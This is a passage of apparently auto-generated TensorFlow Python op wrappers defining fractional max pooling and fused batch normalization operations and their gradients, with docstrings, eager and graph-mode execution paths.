overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_attr_T, (out_backprop,) = _execute.args_to_matching_eager([out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
orig_input_tensor_shape = _ops.convert_to_tensor(orig_input_tensor_shape, _dtypes.int64)
row_pooling_sequence = _ops.convert_to_tensor(row_pooling_sequence, _dtypes.int64)
col_pooling_sequence = _ops.convert_to_tensor(col_pooling_sequence, _dtypes.int64)
_inputs_flat = [orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence]
_attrs = ("overlapping", overlapping, "T", _attr_T)
_result = _execute.execute(b"FractionalAvgPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalAvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_FractionalMaxPoolOutput = collections.namedtuple(
"FractionalMaxPool",
["output", "row_pooling_sequence", "col_pooling_sequence"])
def fractional_max_pool(value, pooling_ratio, pseudo_random=False, overlapping=False, deterministic=False, seed=0, seed2=0, name=None):
r"""Performs fractional max pooling on the input.
Fractional max pooling is slightly different than regular max pooling. In
regular max pooling, you downsize an input set by taking the maximum value of
smaller N x N subsections of the set (often 2x2), and try to reduce the set by
a factor of N, where N is an integer. Fractional max pooling, as you might
expect from the word "fractional", means that the overall reduction ratio N
does not have to be an integer.
The sizes of the pooling regions are generated randomly but are fairly uniform.
For example, let's look at the height dimension, and the constraints on the
list of rows that will be pool boundaries.
First we define the following:
1. input_row_length : the number of rows from the input set
2. output_row_length : which will be smaller than the input
3. alpha = input_row_length / output_row_length : our reduction ratio
4. K = floor(alpha)
5. row_pooling_sequence : this is the result list of pool boundary rows
Then, row_pooling_sequence should satisfy:
1. a[0] = 0 : the first value of the sequence is 0
2. a[end] = input_row_length : the last value of the sequence is the size
3. K <= (a[i+1] - a[i]) <= K+1 : all intervals are K or K+1 size
4. length(row_pooling_sequence) = output_row_length+1
For more details on fractional max pooling, see this paper:
[Benjamin Graham, Fractional Max-Pooling](http://arxiv.org/abs/1412.6071)
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length `>= 4`.
Pooling ratio for each dimension of `value`, currently only
supports row and col dimension and should be >= 1.0. For example, a valid
pooling ratio looks like [1.0, 1.44, 1.73, 1.0]. The first and last elements
must be 1.0 because we don't allow pooling on batch and channels
dimensions. 1.44 and 1.73 are pooling ratio on height and width dimensions
respectively.
pseudo_random: An optional `bool`. Defaults to `False`.
When set to True, generates the pooling sequence in a
pseudorandom fashion, otherwise, in a random fashion. Check paper [Benjamin
Graham, Fractional Max-Pooling](http://arxiv.org/abs/1412.6071) for
difference between pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`.
When set to True, it means when pooling, the values at the boundary
of adjacent pooling cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used twice.
The result would be [20, 16] for fractional max pooling.
deterministic: An optional `bool`. Defaults to `False`.
When set to True, a fixed pooling region will be used when
iterating over a FractionalMaxPool node in the computation graph. Mainly used
in unit test to make FractionalMaxPool deterministic.
seed: An optional `int`. Defaults to `0`.
If either seed or seed2 are set to be non-zero, the random number
generator is seeded by the given seed. Otherwise, it is seeded by a
random seed.
seed2: An optional `int`. Defaults to `0`.
An second seed to avoid seed collision.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, row_pooling_sequence, col_pooling_sequence).
output: A `Tensor`. Has the same type as `value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalMaxPool", name, value, "pooling_ratio",
pooling_ratio, "pseudo_random", pseudo_random, "overlapping",
overlapping, "deterministic", deterministic, "seed", seed, "seed2",
seed2)
_result = _FractionalMaxPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_max_pool_eager_fallback(
value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed,
seed2=seed2, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_max_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalMaxPool", value=value, pooling_ratio=pooling_ratio,
pseudo_random=pseudo_random,
overlapping=overlapping,
deterministic=deterministic, seed=seed,
seed2=seed2, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("pooling_ratio", _op.get_attr("pooling_ratio"), "pseudo_random",
_op._get_attr_bool("pseudo_random"), "overlapping",
_op._get_attr_bool("overlapping"), "deterministic",
_op._get_attr_bool("deterministic"), "seed",
_op._get_attr_int("seed"), "seed2", _op._get_attr_int("seed2"),
"T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalMaxPool", _inputs_flat, _attrs, _result)
_result = _FractionalMaxPoolOutput._make(_result)
return _result
FractionalMaxPool = tf_export("raw_ops.FractionalMaxPool")(_ops.to_raw_op(fractional_max_pool))
def fractional_max_pool_eager_fallback(value, pooling_ratio, pseudo_random, overlapping, deterministic, seed, seed2, name, ctx):
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_max_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_attr_T, (value,) = _execute.args_to_matching_eager([value], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
_inputs_flat = [value]
_attrs = ("pooling_ratio", pooling_ratio, "pseudo_random", pseudo_random,
"overlapping", overlapping, "deterministic", deterministic, "seed", seed,
"seed2", seed2, "T", _attr_T)
_result = _execute.execute(b"FractionalMaxPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalMaxPool", _inputs_flat, _attrs, _result)
_result = _FractionalMaxPoolOutput._make(_result)
return _result
def fractional_max_pool_grad(orig_input, orig_output, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping=False, name=None):
r"""Computes gradient of the FractionalMaxPool function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
Original input for `fractional_max_pool`
orig_output: A `Tensor`. Must have the same type as `orig_input`.
Original output for `fractional_max_pool`
out_backprop: A `Tensor`. Must have the same type as `orig_input`.
4-D with shape `[batch, height, width, channels]`. Gradients
w.r.t. the output of `fractional_max_pool`.
row_pooling_sequence: A `Tensor` of type `int64`.
row pooling sequence, form pooling region with
col_pooling_sequence.
col_pooling_sequence: A `Tensor` of type `int64`.
column pooling sequence, form pooling region with
row_pooling sequence.
overlapping: An optional `bool`. Defaults to `False`.
When set to True, it means when pooling, the values at the boundary
of adjacent pooling cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used twice.
The result would be [20, 16] for fractional max pooling.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalMaxPoolGrad", name, orig_input, orig_output,
out_backprop, row_pooling_sequence, col_pooling_sequence,
"overlapping", overlapping)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_max_pool_grad_eager_fallback(
orig_input, orig_output, out_backprop, row_pooling_sequence,
col_pooling_sequence, overlapping=overlapping, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalMaxPoolGrad", orig_input=orig_input,
orig_output=orig_output,
out_backprop=out_backprop,
row_pooling_sequence=row_pooling_sequence,
col_pooling_sequence=col_pooling_sequence,
overlapping=overlapping, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("overlapping", _op._get_attr_bool("overlapping"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalMaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FractionalMaxPoolGrad = tf_export("raw_ops.FractionalMaxPoolGrad")(_ops.to_raw_op(fractional_max_pool_grad))
def fractional_max_pool_grad_eager_fallback(orig_input, orig_output, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping, name, ctx):
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
(orig_input, orig_output, out_backprop) = _inputs_T
row_pooling_sequence = _ops.convert_to_tensor(row_pooling_sequence, _dtypes.int64)
col_pooling_sequence = _ops.convert_to_tensor(col_pooling_sequence, _dtypes.int64)
_inputs_flat = [orig_input, orig_output, out_backprop, row_pooling_sequence, col_pooling_sequence]
_attrs = ("overlapping", overlapping, "T", _attr_T)
_result = _execute.execute(b"FractionalMaxPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalMaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_FusedBatchNormOutput = collections.namedtuple(
"FusedBatchNorm",
["y", "batch_mean", "batch_variance", "reserve_space_1", "reserve_space_2"])
def _fused_batch_norm(x, scale, offset, mean, variance, epsilon=0.0001, exponential_avg_factor=1, data_format="NHWC", is_training=True, name=None):
r"""Batch normalization.
Note that the size of 4D Tensors are defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
x: A `Tensor`. Must be one of the following types: `float32`.
A 4D Tensor for input data.
scale: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for scaling factor, to scale the normalized x.
offset: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for offset, to shift to the normalized x.
mean: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for population mean. Used for inference only;
must be empty for training.
variance: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for population variance. Used for inference only;
must be empty for training.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
exponential_avg_factor: An optional `float`. Defaults to `1`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for x and y. Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (y, batch_mean, batch_variance, reserve_space_1, reserve_space_2).
y: A `Tensor`. Has the same type as `x`.
batch_mean: A `Tensor`. Has the same type as `x`.
batch_variance: A `Tensor`. Has the same type as `x`.
reserve_space_1: A `Tensor`. Has the same type as `x`.
reserve_space_2: A `Tensor`. Has the same type as `x`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNorm", name, x, scale, offset, mean, variance,
"epsilon", epsilon, "exponential_avg_factor", exponential_avg_factor,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return _fused_batch_norm_eager_fallback(
x, scale, offset, mean, variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNorm", x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "epsilon",
_op.get_attr("epsilon"), "exponential_avg_factor",
_op.get_attr("exponential_avg_factor"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNorm", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormOutput._make(_result)
return _result
FusedBatchNorm = tf_export("raw_ops.FusedBatchNorm")(_ops.to_raw_op(_fused_batch_norm))
def _fused_batch_norm_eager_fallback(x, scale, offset, mean, variance, epsilon, exponential_avg_factor, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, scale, offset, mean, variance], ctx, [_dtypes.float32, ])
(x, scale, offset, mean, variance) = _inputs_T
_inputs_flat = [x, scale, offset, mean, variance]
_attrs = ("T", _attr_T, "epsilon", epsilon, "exponential_avg_factor",
exponential_avg_factor, "data_format", data_format, "is_training",
is_training)
_result = _execute.execute(b"FusedBatchNorm", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNorm", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormOutput._make(_result)
return _result
_FusedBatchNormGradOutput = collections.namedtuple(
"FusedBatchNormGrad",
["x_backprop", "scale_backprop", "offset_backprop", "reserve_space_3", "reserve_space_4"])
def fused_batch_norm_grad(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon=0.0001, data_format="NHWC", is_training=True, name=None):
r"""Gradient for batch normalization.
Note that the size of 4D Tensors are defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
y_backprop: A `Tensor`. Must be one of the following types: `float32`.
A 4D Tensor for the gradient with respect to y.
x: A `Tensor`. Must have the same type as `y_backprop`.
A 4D Tensor for input data.
scale: A `Tensor`. Must have the same type as `y_backprop`.
A 1D Tensor for scaling factor, to scale the normalized x.
reserve_space_1: A `Tensor`. Must have the same type as `y_backprop`.
When is_training is True, a 1D Tensor for the computed batch
mean to be reused in gradient computation. When is_training is
False, a 1D Tensor for the population mean to be reused in both
1st and 2nd order gradient computation.
reserve_space_2: A `Tensor`. Must have the same type as `y_backprop`.
When is_training is True, a 1D Tensor for the computed batch
variance (inverted variance in the cuDNN case) to be reused in
gradient computation. When is_training is False, a 1D Tensor
for the population variance to be reused in both 1st and 2nd
order gradient computation.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for y_backprop, x, x_backprop.
Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_backprop, scale_backprop, offset_backprop, reserve_space_3, reserve_space_4).
x_backprop: A `Tensor`. Has the same type as `y_backprop`.
scale_backprop: A `Tensor`. Has the same type as `y_backprop`.
offset_backprop: A `Tensor`. Has the same type as `y_backprop`.
reserve_space_3: A `Tensor`. Has the same type as `y_backprop`.
reserve_space_4: A `Tensor`. Has the same type as `y_backprop`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormGrad", name, y_backprop, x, scale,
reserve_space_1, reserve_space_2, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _FusedBatchNormGradOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_grad_eager_fallback(
y_backprop, x, scale, reserve_space_1, reserve_space_2,
epsilon=epsilon, data_format=data_format, is_training=is_training,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormGrad", y_backprop=y_backprop, x=x, scale=scale,
reserve_space_1=reserve_space_1,
reserve_space_2=reserve_space_2,
epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "epsilon",
_op.get_attr("epsilon"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormGrad", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradOutput._make(_result)
return _result
FusedBatchNormGrad = tf_export("raw_ops.FusedBatchNormGrad")(_ops.to_raw_op(fused_batch_norm_grad))
def fused_batch_norm_grad_eager_fallback(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([y_backprop, x, scale, reserve_space_1, reserve_space_2], ctx, [_dtypes.float32, ])
(y_backprop, x, scale, reserve_space_1, reserve_space_2) = _inputs_T
_inputs_flat = [y_backprop, x, scale, reserve_space_1, reserve_space_2]
_attrs = ("T", _attr_T, "epsilon", epsilon, "data_format", data_format,
"is_training", is_training)
_result = _execute.execute(b"FusedBatchNormGrad", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormGrad", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradOutput._make(_result)
return _result
_FusedBatchNormGradV2Output = collections.namedtuple(
"FusedBatchNormGradV2",
["x_backprop", "scale_backprop", "offset_backprop", "reserve_space_3", "reserve_space_4"])
def fused_batch_norm_grad_v2(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon=0.0001, data_format="NHWC", is_training=True, name=None):
r"""Gradient for batch normalization.
Note that the size of 4D Tensors are defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
y_backprop: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for the gradient with respect to y.
x: A `Tensor`. Must have the same type as `y_backprop`.
A 4D Tensor for input data.
scale: A `Tensor` of type `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
reserve_space_1: A `Tensor`. Must be one of the following types: `float32`.
When is_training is True, a 1D Tensor for the computed batch
mean to be reused in gradient computation. When is_training is
False, a 1D Tensor for the population mean to be reused in both
1st and 2nd order gradient computation.
reserve_space_2: A `Tensor`. Must have the same type as `reserve_space_1`.
When is_training is True, a 1D Tensor for the computed batch
variance (inverted variance in the cuDNN case) to be reused in
gradient computation. When is_training is False, a 1D Tensor
for the population variance to be reused in both 1st and 2nd
order gradient computation.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for y_backprop, x, x_backprop.
Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_backprop, scale_backprop, offset_backprop, reserve_space_3, reserve_space_4).
x_backprop: A `Tensor`. Has the same type as `y_backprop`.
scale_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
offset_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_3: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_4: A `Tensor`. Has the same type as `reserve_space_1`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormGradV2", name, y_backprop, x, scale,
reserve_space_1, reserve_space_2, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _FusedBatchNormGradV2Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_grad_v2_eager_fallback(
y_backprop, x, scale, reserve_space_1, reserve_space_2,
epsilon=epsilon, data_format=data_format, is_training=is_training,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormGradV2", y_backprop=y_backprop, x=x, scale=scale,
reserve_space_1=reserve_space_1,
reserve_space_2=reserve_space_2,
epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormGradV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV2Output._make(_result)
return _result
FusedBatchNormGradV2 = tf_export("raw_ops.FusedBatchNormGradV2")(_ops.to_raw_op(fused_batch_norm_grad_v2))
def fused_batch_norm_grad_v2_eager_fallback(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([y_backprop, x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
(y_backprop, x) = _inputs_T
_attr_U, _inputs_U = _execute.args_to_matching_eager([reserve_space_1, reserve_space_2], ctx, [_dtypes.float32, ])
(reserve_space_1, reserve_space_2) = _inputs_U
scale = _ops.convert_to_tensor(scale, _dtypes.float32)
_inputs_flat = [y_backprop, x, scale, reserve_space_1, reserve_space_2]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormGradV2", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormGradV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV2Output._make(_result)
return _result
_FusedBatchNormGradV3Output = collections.namedtuple(
"FusedBatchNormGradV3",
["x_backprop", "scale_backprop", "offset_backprop", "reserve_space_4", "reserve_space_5"])
def fused_batch_norm_grad_v3(y_backprop, x, scale, reserve_space_1, reserve_space_2, reserve_space_3, epsilon=0.0001, data_format="NHWC", is_training=True, name=None):
r"""Gradient for batch normalization.
Note that the size of 4D Tensors are defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
y_backprop: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for the gradient with respect to y.
x: A `Tensor`. Must have the same type as `y_backprop`.
A 4D Tensor for input data.
scale: A `Tensor` of type `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
reserve_space_1: A `Tensor`. Must be one of the following types: `float32`.
When is_training is True, a 1D Tensor for the computed batch
mean to be reused in gradient computation. When is_training is
False, a 1D Tensor for the population mean to be reused in both
1st and 2nd order gradient computation.
reserve_space_2: A `Tensor`. Must have the same type as `reserve_space_1`.
When is_training is True, a 1D Tensor for the computed batch
variance (inverted variance in the cuDNN case) to be reused in
gradient computation. When is_training is False, a 1D Tensor
for the population variance to be reused in both 1st and 2nd
order gradient computation.
reserve_space_3: A `Tensor`. Must have the same type as `reserve_space_1`.
When is_training is True, a 1D Tensor for some intermediate results to be reused
in gradient computation. When is_training is False, a dummy empty Tensor will be
created.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
data_format: An optional `string` from: `"NHWC", "NCHW", "NDHWC", "NCDHW"`. Defaults to `"NHWC"`.
The data format for y_backprop, x, x_backprop.
Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_backprop, scale_backprop, offset_backprop, reserve_space_4, reserve_space_5).
x_backprop: A `Tensor`. Has the same type as `y_backprop`.
scale_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
offset_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_4: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_5: A `Tensor`. Has the same type as `reserve_space_1`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormGradV3", name, y_backprop, x, scale,
reserve_space_1, reserve_space_2, reserve_space_3, "epsilon", epsilon,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormGradV3Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_grad_v3_eager_fallback(
y_backprop, x, scale, reserve_space_1, reserve_space_2,
reserve_space_3, epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormGradV3", y_backprop=y_backprop, x=x, scale=scale,
reserve_space_1=reserve_space_1,
reserve_space_2=reserve_space_2,
reserve_space_3=reserve_space_3,
epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormGradV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV3Output._make(_result)
return _result
FusedBatchNormGradV3 = tf_export("raw_ops.FusedBatchNormGradV3")(_ops.to_raw_op(fused_batch_norm_grad_v3))
